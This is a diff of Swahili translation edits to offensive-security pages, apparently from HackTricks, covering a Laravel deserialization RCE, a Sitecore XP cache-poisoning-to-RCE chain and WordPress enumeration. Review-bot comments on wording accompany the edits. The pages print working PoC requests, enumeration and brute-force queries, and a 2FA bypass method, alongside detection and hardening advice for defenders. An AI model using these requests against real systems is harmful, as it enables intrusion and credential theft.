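Review bot: both the old and the new sentence say "huhifadhi APP inayotumiwa ku-encrypt cookies" while the sentence two lines later names `APP_KEY`; the new line should read "huhifadhi APP_KEY inayotumiwa ..." so the variable leaked via `/../.env` is named correctly.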
@ -218,12 +220,12 @@ encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2Swe
```
### Laravel Deserialization RCE
Toleo zilizo hatarini: 5.5.40 na 5.6.x hadi 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Matoleo yaliyo hatarini: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Hapa unaweza kupata taarifa kuhusu deserialization vulnerability: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Unaweza kujaribu na kui-exploit ukitumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kui-exploit kwa kutumia metasploit: `use unix/http/laravel_token_unserialize_exec`
Unaweza kujaribu na kui-exploit kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kui-exploit kwa metasploit: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
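Review bot: the new version-range line mixes languages ("5.5.40 and 5.6.x through 5.6.29") inside a Swahili sentence; keep the earlier wording "5.5.40 na 5.6.x hadi 5.6.29" so the affected-version statement reads consistently with the paragraph around it.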
@ -231,7 +233,7 @@ Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https:
## Marejeo
## Marejeleo
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)

View File

@ -2,12 +2,12 @@
{{#include ../../../banners/hacktricks-training.md}}
Ukurasa huu unatoa muhtasari wa mnyororo wa shambulio wa vitendo dhidi ya Sitecore XP 10.4.1 unaotoka kutoka kwenye preauth XAML handler hadi HTML cache poisoning na, kupitia authenticated UI flow, kufikia RCE kupitia BinaryFormatter deserialization. Mbinu hizi zinaweza kutumika kwa matoleo/vitengo vya Sitecore vinavyofanana na zinatoa primitives za kujaribu, kugundua, na kuimarisha.
Ukurasa huu unafupisha mlolongo wa shambulio wa vitendo dhidi ya Sitecore XP 10.4.1 ambao unasogeza kutoka preauth XAML handler hadi HTML cache poisoning na, kupitia authenticated UI flow, hadi RCE kupitia BinaryFormatter deserialization. Mbinu hizi zinaweza kutumika kwa toleo/vipengele vinavyofanana vya Sitecore na zinatoa primitives maalum za kujaribu, kugundua, na kuimarisha.
- Bidhaa iliyoathiriwa iliyojaribiwa: Sitecore XP 10.4.1 rev. 011628
- Imerekebishwa katika: KB1003667, KB1003734 (Juni/Julai 2025)
- Imerekebishwa katika: KB1003667, KB1003734 (June/July 2025)
Angalia pia:
See also:
{{#ref}}
../../../pentesting-web/cache-deception/README.md
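Review bot: "Juni/Julai 2025" becomes "June/July 2025" and "Angalia pia:" becomes "See also:", which is the opposite direction from the rest of this translation commit; unless those are the `-` lines, the fix date and the cross-reference lead-in should stay in Swahili.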
@ -19,7 +19,7 @@ Angalia pia:
## Preauth primitive: XAML Ajax reflection → HtmlCache write
Entrypoint is the preauth XAML handler registered in web.config:
Sehemu ya kuingia ni preauth XAML handler iliyosajiliwa katika web.config:
```xml
<add verb="*" path="sitecore_xaml.ashx" type="Sitecore.Web.UI.XamlSharp.Xaml.XamlPageHandlerFactory, Sitecore.Kernel" name="Sitecore.XamlPageRequestHandler" />
```
@ -27,7 +27,7 @@ Inapatikana kupitia:
```
GET /-/xaml/Sitecore.Shell.Xaml.WebControl
```
Mti wa controls unajumuisha AjaxScriptManager ambayo, kwenye maombi ya matukio, husoma maeneo yaliyodhibitiwa na mshambuliaji na kwa kutumia reflection huitekeleza methods kwenye controls zilizolengwa:
Mti wa udhibiti unajumuisha AjaxScriptManager ambayo, kwenye maombi ya tukio, husoma mashamba yanayodhibitiwa na mshambuliaji na kwa reflection huitekeleza mbinu kwenye vidhibiti vilivyolengwa:
```csharp
// AjaxScriptManager.OnPreRender
string clientId = page.Request.Form["__SOURCE"]; // target control
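Review bot: "methods" is rendered as "mbinu" (techniques) in the new sentence about AjaxScriptManager, but the code right below is about C# reflection on control methods (`m.Invoke(this, e.Parameters)`); keep the untranslated term "methods" here, as the old line did, so the prose matches the code it introduces.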
@ -42,7 +42,7 @@ if (m != null) m.Invoke(this, e.Parameters);
// Alternate branch for XML-based controls
if (control is XmlControl && AjaxScriptManager.DispatchXmlControl(control, args)) {...}
```
Uchunguzi muhimu: ukurasa la XAML una mfano wa XmlControl (xmlcontrol:GlobalHeader). Sitecore.XmlControls.XmlControl inatokana na Sitecore.Web.UI.WebControl (darasa la Sitecore), ambalo linapitisha ReflectionUtil.Filter allowlist (Sitecore.*), likifungua methods kwenye Sitecore WebControl.
Uchunguzi muhimu: ukurasa wa XAML una mfano wa XmlControl (xmlcontrol:GlobalHeader). Sitecore.XmlControls.XmlControl unatokana na Sitecore.Web.UI.WebControl (darasa la Sitecore), ambalo linapitia ReflectionUtil.Filter allowlist (Sitecore.*), likifungua mbinu kwenye Sitecore WebControl.
Magic method for poisoning:
```csharp
@ -52,9 +52,9 @@ HtmlCache c = CacheManager.GetHtmlCache(Sitecore.Context.Site);
if (c != null) c.SetHtml(cacheKey, html, this._cacheTimeout);
}
```
Kwa sababu tunaweza kulenga xmlcontrol:GlobalHeader na kuita Sitecore.Web.UI.WebControl methods kwa jina, tunapata preauth arbitrary HtmlCache write primitive.
Kwa sababu tunaweza kulenga xmlcontrol:GlobalHeader na kuita mbinu za Sitecore.Web.UI.WebControl kwa jina, tunapata preauth arbitrary HtmlCache write primitive.
### Ombi la PoC (CVE-2025-53693)
### PoC request (CVE-2025-53693)
```
POST /-/xaml/Sitecore.Shell.Xaml.WebControl HTTP/2
Host: target
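Review bot: the heading pair "### Ombi la PoC (CVE-2025-53693)" / "### PoC request (CVE-2025-53693)" flips between Swahili and English while the earlier "## Preauth primitive: ..." heading is left in English; pick one language for the headings of this file rather than deciding it heading by heading.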
@ -63,12 +63,12 @@ Content-Type: application/x-www-form-urlencoded
__PARAMETERS=AddToCache("wat","<html><body>pwn</body></html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
Vidokezo:
- __SOURCE ni clientID ya xmlcontrol:GlobalHeader ndani ya Sitecore.Shell.Xaml.WebControl (kwa kawaida thabiti kama ctl00_ctl00_ctl05_ctl03 kwa kuwa hutokana na XAML isiyobadilika).
- __SOURCE ni clientID ya xmlcontrol:GlobalHeader ndani ya Sitecore.Shell.Xaml.WebControl (kwa kawaida thabiti kama ctl00_ctl00_ctl05_ctl03 kwani inatokana na XAML thabiti).
- __PARAMETERS muundo ni Method("arg1","arg2").
## Nini cha poison: Ujenzi wa Cache key
## Nini cha kuchafulia: Ujenzi wa ufunguo wa Cache
Ujenzi wa kawaida wa HtmlCache key unaotumiwa na Sitecore controls:
Ujenzi wa kawaida wa ufunguo wa HtmlCache unaotumika na vidhibiti vya Sitecore:
```csharp
public virtual string GetCacheKey(){
SiteContext site = Sitecore.Context.Site;
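Review bot: the bullet "__PARAMETERS muundo ni Method("arg1","arg2")" has the Swahili word order backwards; "Muundo wa __PARAMETERS ni Method("arg1","arg2")" reads correctly. It would also help defenders to say here that the `__ISEVENT=1` plus `__PARAMETERS=AddToCache(...)` combination is exactly what the detection section later keys on.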
@ -90,13 +90,13 @@ return k;
return string.Empty;
}
```
Mfano wa targeted poisoning kwa sublayout inayojulikana:
Mfano wa targeted poisoning kwa sublayout iliyojulikana:
```
__PARAMETERS=AddToCache("/layouts/Sample+Sublayout.ascx_%23lang:EN_%23login:False_%23qs:_%23index","<html>…attacker HTML…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
## Kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache na vipimo vya “vary by”
## Kuorodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na vipimo vya “vary by”
Ikiwa ItemService imefunuliwa (kibaya) kwa watu wasiojulikana, unaweza kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache ili kupata funguo sahihi.
Ikiwa ItemService imefunuliwa (kibaya) kwa watumiaji wasiojulikana, unaweza kuorodhesha vipengele vinavyoweza kuhifadhiwa kwenye cache ili kupata funguo sahihi.
Jaribio la haraka:
```
@ -104,17 +104,17 @@ GET /sitecore/api/ssc/item
// 404 Sitecore error body → exposed (anonymous)
// 403 → blocked/auth required
```
Orodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na bendera:
Orodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na flags:
```
GET /sitecore/api/ssc/item/search?term=layouts&fields=&page=0&pagesize=100
```
Angalia sehemu kama Path, Cacheable, VaryByDevice, VaryByLogin, ClearOnIndexUpdate. Majina ya vifaa yanaweza kuorodheshwa kupitia:
Tafuta mashamba kama Path, Cacheable, VaryByDevice, VaryByLogin, ClearOnIndexUpdate. Majina ya vifaa yanaweza kuorodheshwa kupitia:
```
GET /sitecore/api/ssc/item/search?term=_templatename:Device&fields=ItemName&page=0&pagesize=100
```
### Sidechannel enumeration chini ya vitambulisho vilivyo na vikwazo (CVE-2025-53694)
### Sidechannel enumeration chini ya vitambulisho vilivyopunguzwa (CVE-2025-53694)
Hata pale ItemService inapojifanya akaunti iliyopunguzwa (e.g., ServicesAPI) na kurudisha array tupu ya Results, TotalCount bado inaweza kuonyesha preACL Solr hits. Unaweza bruteforce item groups/ids kwa wildcards na kutazama TotalCount ikijikusanya ili kuchora ramani ya internal content na devices:
Hata pale ItemService inapoiga akaunti iliyopunguzwa (kwa mfano, ServicesAPI) na kurudisha Results array tupu, TotalCount inaweza bado kuonyesha preACL Solr hits. Unaweza bruteforce item groups/ids kwa wildcards na kuangalia TotalCount ikikaribia ili ramani maudhui ya ndani na vifaa:
```
GET /sitecore/api/ssc/item/search?term=%2B_templatename:Device;%2B_group:a*&fields=&page=0&pagesize=100&includeStandardTemplateFields=true
→ "TotalCount": 3
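Review bot: the new sentence "ili ramani maudhui ya ndani na vifaa" is missing its verb ("ili kuchora ramani ya maudhui ya ndani na vifaa"), and "ikikaribia" does not convey "converging"; the old "ikijikusanya" or "ikipungua hadi item moja" is closer. A pointer that the mitigation for this `TotalCount` side channel (locking `/sitecore/api/ssc` and avoiding the impersonation pattern) lives in the hardening list would also help a reader who stops at this section.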
@ -123,7 +123,7 @@ GET /...term=%2B_templatename:Device;%2B_group:aa*
GET /...term=%2B_templatename:Device;%2B_group:aa30d078ed1c47dd88ccef0b455a4cc1*
→ narrow to a specific item
```
## Postauth RCE: BinaryFormatter sink katika convertToRuntimeHtml (CVE-2025-53691)
## Postauth RCE: BinaryFormatter sink in convertToRuntimeHtml (CVE-2025-53691)
Sink:
```csharp
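Review bot: the heading "## Postauth RCE: BinaryFormatter sink katika convertToRuntimeHtml" goes back to "sink in", the opposite direction from the other heading edits in this file; keep the Swahili "katika" unless the whole heading is meant to remain English like the "Preauth primitive" heading above.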
@ -131,14 +131,14 @@ Sink:
byte[] b = Convert.FromBase64String(data);
return new BinaryFormatter().Deserialize(new MemoryStream(b));
```
Inapatikana kupitia hatua ya pipeline convertToRuntimeHtml ConvertWebControls, ambayo inatafuta element yenye id {iframeId}_inner na hufanya base64 decode + deserializes yake, kisha inaingiza string inayotokana ndani ya HTML:
Inafikiwa kupitia hatua ya pipeline convertToRuntimeHtml ConvertWebControls, ambayo inatafuta kipengele chenye id {iframeId}_inner na hufanya base64 decode + deserialize yake, kisha inaingiza mnyororo uliotokana katika HTML:
```csharp
HtmlNode inner = doc.SelectSingleNode("//*[@id='"+id+"_inner']");
string text2 = inner?.GetAttributeValue("value", "");
if (text2.Length > 0)
htmlNode2.InnerHtml = StringUtil.GetString(Sitecore.Convert.Base64ToObject(text2) as string);
```
Chochea (iliyothibitishwa, haki za Content Editor). Dialogi ya FixHtml inaita convertToRuntimeHtml. Mchakato kamili bila kubofya UI:
Chochea (authenticated, Content Editor rights). Dialogu ya FixHtml inaita convertToRuntimeHtml. Mwishokwamwisho bila kubofya UI:
```
// 1) Start Content Editor
GET /sitecore/shell/Applications/Content%20Editor.aspx
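Review bot: "mnyororo uliotokana" translates the code term "string" as "chain"; since the sink returns the deserialized object `as string` and writes it into `InnerHtml`, keep "string" untranslated (as the previous line does) so the prose matches `StringUtil.GetString(...)` in the code block.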
@ -168,22 +168,22 @@ Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a
## Mnyororo kamili
1) Mshambulizi wa Preauth anachafua HtmlCache na HTML yoyote kwa kuitisha kwa reflective WebControl.AddToCache kupitia XAML AjaxScriptManager.
2) HTML iliyochafuliwa hutumikia JavaScript inayomshawishi mtumiaji aliye authenticated wa Content Editor kupitia mtiririko wa FixHtml.
3) Ukurasa wa FixHtml unasababisha convertToRuntimeHtml → ConvertWebControls, ambayo inadekodeserializa base64 inayoendeshwa na mshambuliaji kupitia BinaryFormatter → RCE chini ya identity ya app pool ya Sitecore.
1) Preauth attacker poisons HtmlCache with arbitrary HTML by reflectively invoking WebControl.AddToCache via XAML AjaxScriptManager.
2) Poisoned HTML serves JavaScript that nudges an authenticated Content Editor user through the FixHtml flow.
3) The FixHtml page triggers convertToRuntimeHtml → ConvertWebControls, which deserializes attackercontrolled base64 via BinaryFormatter → RCE under the Sitecore app pool identity.
## Ugunduzi
- Preauth XAML: maombi kwa `/-/xaml/Sitecore.Shell.Xaml.WebControl` yenye `__ISEVENT=1`, `__SOURCE` isiyo ya kawaida na `__PARAMETERS=AddToCache(...)`.
- ItemService probing: spikes ya maswali ya wildcard kwa `/sitecore/api/ssc`, `TotalCount` kubwa na `Results` tupu.
- Deserialization attempts: `EditHtml.aspx` ikifuatiwa na `FixHtml.aspx?hdl=...` na base64 kubwa isiyo ya kawaida katika vikambu vya HTML.
- Preauth XAML: requests to `/-/xaml/Sitecore.Shell.Xaml.WebControl` with `__ISEVENT=1`, suspicious `__SOURCE` and `__PARAMETERS=AddToCache(...)`.
- ItemService probing: spikes of `/sitecore/api/ssc` wildcard queries, large `TotalCount` with empty `Results`.
- Deserialization attempts: `EditHtml.aspx` followed by `FixHtml.aspx?hdl=...` and unusually large base64 in HTML fields.
## Kuimarisha usalama
## Kukaza usalama
- Apply Sitecore patches KB1003667 and KB1003734; gate/disable preauth XAML handlers or add strict validation; fuatilia na weka ratelimit `/-/xaml/`.
- Ondoa/ibadilishe BinaryFormatter; zuia upatikanaji wa convertToRuntimeHtml au tekeleza uthibitisho mkali upande wa server kwa mtiririko wa uhariri wa HTML.
- Funga `/sitecore/api/ssc` kwa loopback au roles zilizo authenticated; epuka mifumo ya impersonation zinazoweza leak za side channels zenye msingi wa `TotalCount`.
- Leteza MFA/least privilege kwa watumiaji wa Content Editor; hakiki CSP ili kupunguza athari ya JS steering kutoka cache poisoning.
- Weka Sitecore patches KB1003667 na KB1003734; zuia/zimia preauth XAML handlers au ongeza uthibitisho mkali; angalia na weka ratelimit kwa `/-/xaml/`.
- Ondoa/badilisha BinaryFormatter; punguza ufikiaji wa convertToRuntimeHtml au utekeleze uthibitisho mzito upande wa server kwa HTML editing flows.
- Funga `/sitecore/api/ssc` kwa loopback au roles zilizo authenticated; epuka impersonation patterns ambazo zinatoa leak za sidechannels za `TotalCount`.
- Tekeleza MFA/least privilege kwa watumiaji wa Content Editor; pitia CSP ili kupunguza athari za JS steering kutokana na cache poisoning.
## References
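Review bot: within this hunk the "Mnyororo kamili" and "Ugunduzi" lists have a Swahili and an English version, while the hardening list has a mixed-language version ("Apply Sitecore patches ... fuatilia na weka ratelimit") and a fully Swahili version; whichever side is added, three adjacent sections end up in different languages. Settle on one: the fully Swahili hardening bullets ("Weka Sitecore patches KB1003667 na KB1003734 ...") are the cleanest, and the chain and detection lists should match them.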

View File

@ -4,49 +4,49 @@
## Taarifa za Msingi
- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
- **Themes files can be found in /wp-content/themes/,** hivyo ukibadilisha baadhi ya php ya theme ili kupata RCE huenda utatumia path hiyo. Kwa mfano: Using **theme twentytwelve** unaweza **access** faili **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **Uploaded** faili zinaenda kwa: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
- **Files za theme zinaweza kupatikana katika /wp-content/themes/,** hivyo ukibadilisha php ya theme ili kupata RCE huenda utatumia path hiyo. Kwa mfano: Kwa kutumia **theme twentytwelve** unaweza **kupata** faili **404.php** katika: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- **URL nyingine yenye msaada inaweza kuwa:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
- Katika **wp-config.php** unaweza kupata root password ya database.
- Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
- Njia za kawaida za kuingia za kukagua: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
### **Main WordPress Files**
### **Faili Muhimu za WordPress**
- `index.php`
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosanidiwa.
- `wp-activate.php` inatumiwa kwa mchakato wa activation kwa email wakati wa kuanzisha tovuti mpya ya WordPress.
- Login folders (may be renamed to hide it):
- `license.txt` ina taarifa muhimu kama toleo la WordPress lililosakinishwa.
- `wp-activate.php` inatumika kwa mchakato wa uanzishaji wa email wakati wa kusanidi tovuti mpya ya WordPress.
- Folda za login (zinaweza kubadilishwa jina ili kuzificha):
- `/wp-admin/login.php`
- `/wp-admin/wp-login.php`
- `/login.php`
- `/wp-login.php`
- `xmlrpc.php` ni faili inayowakilisha feature ya WordPress inayoruhusu data kusafirishwa kwa kutumia HTTP kama transport mechanism na XML kama encoding mechanism. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
- Folder ya `wp-content` ni saraka kuu ambapo plugins na themes zinahifadhiwa.
- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye platform zinahifadhiwa.
- `wp-includes/` ni saraka ambapo core files zinahifadhiwa, kama certificates, fonts, JavaScript files, na widgets.
- `wp-sitemap.xml` Katika WordPress versions 5.5 na baadaye, WordPress huunda faili ya sitemap XML yenye machapisho yote ya umma na post types na taxonomies zinazoweza kuulizwa hadharani.
- `xmlrpc.php` ni faili inayoonyesha kipengele cha WordPress kinachowawezesha data kutumwa kwa HTTP kama njia ya usafirishaji na XML kama njia ya kubandika. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
- Folda ya `wp-content` ni saraka kuu ambapo plugins na themes zimehifadhiwa.
- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye jukwaa zinahifadhiwa.
- `wp-includes/` ni saraka ambayo faili za msingi zinahifadhiwa, kama certificates, fonts, faili za JavaScript, na widgets.
- `wp-sitemap.xml` Katika versions za WordPress 5.5 na zaidi, WordPress inazalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za machapisho na taxonomies zinazoweza kuulizwa kwa umma.
**Post exploitation**
- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys and salts, na database table prefix. Faili hii ya configuration pia inaweza kutumiwa kuwasha DEBUG mode, ambayo inaweza kusaidia katika troubleshooting.
- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys na salts, na prefix ya jedwali la database. Faili hii ya usanidi pia inaweza kutumika kuwasha DEBUG mode, ambayo inaweza kuwa ya msaada katika kutatua matatizo.
### Users Permissions
### Ruhusa za Watumiaji
- **Administrator**
- **Editor**: Huchapisha na kusimamia machapisho yake na ya wengine
- **Author**: Huchapisha na kusimamia machapisho yake mwenyewe
- **Contributor**: Anaandika na kusimamia machapisho yake lakini hawezi kuyachapisha
- **Subscriber**: Vichapisho vya kivinjari na kuhariri profile yao
- **Editor**: Kuchapisha na kusimamia machapisho yake na ya wengine
- **Author**: Kuchapisha na kusimamia machapisho yake mwenyewe
- **Contributor**: Kuandika na kusimamia machapisho yake lakini hawezi kuyachapisha
- **Subscriber**: Kuangalia machapisho na kuhariri wasifu wao
## **Passive Enumeration**
### **Get WordPress version**
### **Pata toleo la WordPress**
Angalia kama unaweza kupata faili `/license.txt` au `/readme.html`
Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
Ndani ya **source code** ya ukurasa (mfano kutoka kwa [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
- grep
```bash
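Review bot: the bullet "URL nyingine yenye msaada inaweza kuwa: /wp-content/themes/default/404.php" still links to `/wp-content/themes/twentytwelve/404.php`, so link text and target disagree (the old line has the same mismatch); point the href at the `default` theme path or drop the bullet. Two smaller points in the same hunk: "XML kama njia ya kubandika" renders "encoding" as "pasting", so keep "encoding" as the old bullet did; and "root password ya database" overstates what `wp-config.php` holds, which is the database credentials WordPress connects with, not necessarily a root account.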
@ -56,11 +56,11 @@ curl https://victim.com/ | grep 'content="WordPress'
![](<../../images/image (1111).png>)
- CSS link files
- Mafaili ya link za CSS
![](<../../images/image (533).png>)
- JavaScript files
- Mafaili ya JavaScript
![](<../../images/image (524).png>)
@ -72,44 +72,44 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
### Kutoa matoleo kwa ujumla
### Chota matoleo kwa ujumla
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
## Uorodheshaji wa Kivitendo
## Uorodheshaji hai
### Plugins and Themes
Huenda hautaweza kugundua Plugins and Themes zote zinazowezekana. Ili kuwagundua zote, utahitaji **kivitendo Brute Force orodha ya Plugins and Themes** (kwa bahati nzuri kwetu kuna zana za kiotomatiki ambazo zinajumuisha orodha hizi).
Huenda hautaweza kupata Plugins and Themes zote zinazowezekana. Ili kugundua zote, utahitaji **actively Brute Force a list of Plugins and Themes** (kwa bahati nzuri kwetu kuna zana za kiotomatiki zinazojumuisha orodha hizi).
### Watumiaji
- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing IDs za watumiaji:
- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing users IDs:
```bash
curl -s -I -X GET http://blog.example.com/?author=1
```
Iwapo majibu ni **200** au **30X**, hiyo ina maana id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
Kama majibu ni **200** au **30X**, hiyo ina maana id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
- **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:
```bash
curl http://blog.example.com/wp-json/wp/v2/users
```
Endpoint mwingine wa `/wp-json/` ambao unaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:
Endpoint nyingine ya `/wp-json/` ambayo inaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:
```bash
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
Note that this endpoint only exposes users that have made a post. **Only information about the users that has this feature enable will be provided**.
Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliotengeneza chapisho. **Taarifa zitolewazo ni za watumiaji tu ambao kipengele hiki kimewezeshwa**.
Also note that **/wp-json/wp/v2/pages** could leak IP addresses.
Pia kumbuka kwamba **/wp-json/wp/v2/pages** inaweza leak anwani za IP.
- **Login username enumeration**: Wakati wa kuingia kwenye **`/wp-login.php`** **message** huwa **tofauti**, ikionyesha ikiwa **username** ipo au la.
- **Login username enumeration**: Unapojaribu kuingia kwenye **`/wp-login.php`** **ujumbe** hutofautiana — unaonyesha kama **username** ipo au la.
### XML-RPC
Ikiwa `xml-rpc.php` inafanya kazi unaweza kufanya credentials brute-force au kuitumia kuanzisha mashambulizi ya DoS kwa rasilimali nyingine. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
Ikiwa `xml-rpc.php` ni active unaweza kufanya credentials brute-force au kuitumia kuzindua DoS attacks dhidi ya rasilimali nyingine. (Unaweza otomatisha mchakato huu[ using this](https://github.com/relarizky/wpxploit) kwa mfano).
To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
Ili kuona ikiwa imewekwa active jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili:
**Angalia**
```html
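Review bot: the XML-RPC intro refers to `xml-rpc.php` (with a hyphen) in both the old and the new sentence, while the next sentence and the rest of the section use `/xmlrpc.php`; use `xmlrpc.php` consistently, since that is the file actually being probed.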
@ -122,7 +122,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
**Credentials Bruteforce**
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu ambazo zinaweza kutumika ku-brute-force credentials. Ikiwa unaweza kupata yoyote ya hizi unaweza kutuma kitu kama:
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kwa brute-force credentials. Ikiwa unaweza kupata yoyote kati yao unaweza kutuma kitu kama:
```html
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
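Review bot: the bold method name **`wp.getUserBlogs`** does not match the `<methodName>wp.getUsersBlogs</methodName>` used in the request below (nor the `metaWeblog.getUsersBlogs` named in the same sentence); correct it to `wp.getUsersBlogs` in the new line.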
@ -132,13 +132,13 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
</params>
</methodCall>
```
Ujumbe _"Jina la mtumiaji au nywila si sahihi"_ ndani ya 200 code response unapaswa kuonekana ikiwa credentials sio sahihi.
Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya jibu la code 200 unapaswa kuonekana ikiwa maelezo ya kuingia si sahihi.
![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../images/image (721).png>)
Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response, path itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
Kwa kutumia maelezo ya kuingia sahihi unaweza kupakia faili. Katika jibu njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
```html
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
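Review bot: the quoted server message _"Jina la mtumiaji au nenosiri si sahihi"_ is WordPress's response text, which the target emits in its own locale rather than in the translation's; translating quoted program output makes it useless as a string to match on. Keep the literal message the site returns (the English default is "Incorrect username or password.") and, if wanted, add the Swahili gloss in parentheses.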
@ -168,18 +168,18 @@ Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response, path itao
</params>
</methodCall>
```
Pia kuna njia ya **haraka zaidi** ya brute-force credentials kwa kutumia **`system.multicall`** kwani unaweza kujaribu credentials kadhaa katika ombi moja:
Pia kuna njia **haraka zaidi** ya brute-force credentials kwa kutumia **`system.multicall`**, kwani unaweza kujaribu credentials kadhaa katika ombi moja:
<figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
**Bypass 2FA**
Njia hii imelengwa kwa programu na si watu, ni ya zamani, kwa hiyo haitegemei 2FA. Kwa hivyo, ikiwa una creds halali lakini mlango mkuu umehifadhiwa na 2FA, **huenda ukaweza kutumia xmlrpc.php kuingia ukitumia creds hizo na kuepuka 2FA**. Kumbuka hutakuwa na uwezo wa kufanya vitendo vyote unavyoweza kupitia console, lakini bado huenda ukaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
Mbinu hii imekusudiwa kwa programu na si kwa watu, na ni ya zamani, hivyo haiungi mkono 2FA. Kwa hivyo, kama una creds halali lakini lango kuu limehifadhiwa kwa 2FA, **unaweza kuweza kutumia xmlrpc.php kuingia na hayo creds ukiepuka 2FA**. Kumbuka hautaweza kufanya vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoeleza katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
**DDoS or port scanning**
